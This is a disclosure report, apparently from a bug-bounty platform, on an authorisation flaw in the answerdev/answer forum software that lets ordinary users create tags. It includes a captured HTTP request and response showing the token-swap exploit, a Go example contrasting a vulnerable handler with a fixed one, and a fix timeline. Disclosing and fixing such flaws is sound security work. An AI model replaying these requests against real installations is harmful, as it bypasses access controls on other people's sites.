attackers with role "USER" can create tags in answerdev/answer

Status: Valid

Reported on: Jul 1st 2023


Description

It seems that users with the "USER" role have no permission to create tags, but the application does not enforce it. Other operations, such as edit and delete, do not have this problem.

Proof of Concept

Pull the latest Docker image and set up Answer.

1. Create a user named "normaluser" whose role is "USER".

2. As admin, create a tag.

3. Use Burp Suite to intercept the request, as below:

POST /answer/api/v1/tag HTTP/1.1
Host: localhost:9080
Content-Length: 65
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/tags/create
Accept-Encoding: gzip, deflate
Connection: close
Authorization: fd201c60-1819-11ee-82d0-0242ac170002

{"display_name":"tag3","slug_name":"tag3","original_text":"tag3"}

4. Replace the Authorization header with normaluser's Authorization value and send the request.

5. The response can look like:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 01 Jul 2023 14:25:32 GMT
Content-Length: 81
Connection: close

{"code":200,"reason":"base.success","msg":"Success.","data":{"slug_name":"tag3"}}

Impact

Privilege escalation: a user with the "USER" role can perform a tag-creation action that is reserved for higher roles.
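To show what the missing check looks like on the server side, here is an added Go example; it is not the Answer project's own code. It puts a minimal tag-creation handler in the vulnerable form described above next to a version that checks the caller's role before writing anything. The role names, the `TagStore`, the handler functions and the 403 envelope are assumptions for illustration; the request and response shapes mirror the capture in the proof of concept.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// Role models the two roles named in the report. The constant names are
// assumptions for this example; the project's real role model is not shown.
type Role string

const (
	RoleUser  Role = "USER"
	RoleAdmin Role = "ADMIN"
)

// User is the principal resolved server-side from the Authorization header.
// The role must come from the session store, never from the request body.
type User struct {
	Name string
	Role Role
}

// CreateTagRequest matches the JSON body captured in the proof of concept.
type CreateTagRequest struct {
	DisplayName  string `json:"display_name"`
	SlugName     string `json:"slug_name"`
	OriginalText string `json:"original_text"`
}

// Response mirrors the envelope in the captured 200 response.
type Response struct {
	Code   int               `json:"code"`
	Reason string            `json:"reason"`
	Msg    string            `json:"msg"`
	Data   map[string]string `json:"data,omitempty"`
}

// ErrForbidden is returned when the caller's role may not create tags.
var ErrForbidden = errors.New("role is not permitted to create tags")

// TagStore is an in-memory stand-in for the database (assumed for the example).
type TagStore struct {
	tags map[string]CreateTagRequest
}

func NewTagStore() *TagStore { return &TagStore{tags: map[string]CreateTagRequest{}} }

// Count reports how many tags were persisted, so a caller can prove that a
// rejected request left no trace in the store.
func (s *TagStore) Count() int { return len(s.tags) }

// AuthorizeTagCreate is the server-side decision the report found missing.
// Only the role resolved for the authenticated user is consulted.
func AuthorizeTagCreate(u User) error {
	if u.Role != RoleAdmin {
		return ErrForbidden
	}
	return nil
}

// persist parses the body and writes the tag. Both handlers share it so that
// the only difference between them is the authorization step.
func (s *TagStore) persist(body []byte) Response {
	var req CreateTagRequest
	if err := json.Unmarshal(body, &req); err != nil || req.SlugName == "" {
		return Response{Code: 400, Reason: "base.bad_request", Msg: "invalid tag payload"}
	}
	s.tags[req.SlugName] = req
	return Response{Code: 200, Reason: "base.success", Msg: "Success.",
		Data: map[string]string{"slug_name": req.SlugName}}
}

// CreateTagVulnerable reproduces the behaviour described in the report: the
// caller is authenticated, but the role is never checked, so a USER receives
// the same success envelope as an admin.
func (s *TagStore) CreateTagVulnerable(u User, body []byte) Response {
	return s.persist(body)
}

// CreateTagFixed checks the role before anything is written. The 403 envelope
// is an assumption; the project's actual error format is not on the page.
func (s *TagStore) CreateTagFixed(u User, body []byte) Response {
	if err := AuthorizeTagCreate(u); err != nil {
		return Response{Code: 403, Reason: "base.forbidden", Msg: err.Error()}
	}
	return s.persist(body)
}

func main() {
	// Constructed sample: the body from the proof of concept, sent by "normaluser".
	body := []byte(`{"display_name":"tag3","slug_name":"tag3","original_text":"tag3"}`)
	normal := User{Name: "normaluser", Role: RoleUser}

	vuln, fixed := NewTagStore(), NewTagStore()
	v, _ := json.Marshal(vuln.CreateTagVulnerable(normal, body))
	f, _ := json.Marshal(fixed.CreateTagFixed(normal, body))
	fmt.Printf("vulnerable: %s (tags stored: %d)\n", v, vuln.Count())
	fmt.Printf("fixed:      %s (tags stored: %d)\n", f, fixed.Count())
}
```

The design point is that the check runs before the store is touched and reads only the server-resolved role: swapping the Authorization header, as the proof of concept does, changes which principal is resolved but cannot grant that principal a role it does not hold.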

Timeline

- We are processing your report and will contact the answerdev/answer team within 24 hours. (3 months ago)
- lujiefsi modified the report (3 months ago)
- We have contacted a member of the answerdev/answer team and are waiting to hear back (3 months ago)
- answerdev/answer maintainer validated this vulnerability (2 months ago)

  Thanks for the feedback!

- lujiefsi has been awarded the disclosure bounty
- The fix bounty is now up for grabs
- The researcher's credibility has increased: +7
- answerdev/answer maintainer marked this as fixed in v1.1.1 with commit 964195 (2 months ago)
- The fix bounty has been dropped
- This vulnerability has been assigned a CVE
- answerdev/answer maintainer published this vulnerability (2 months ago)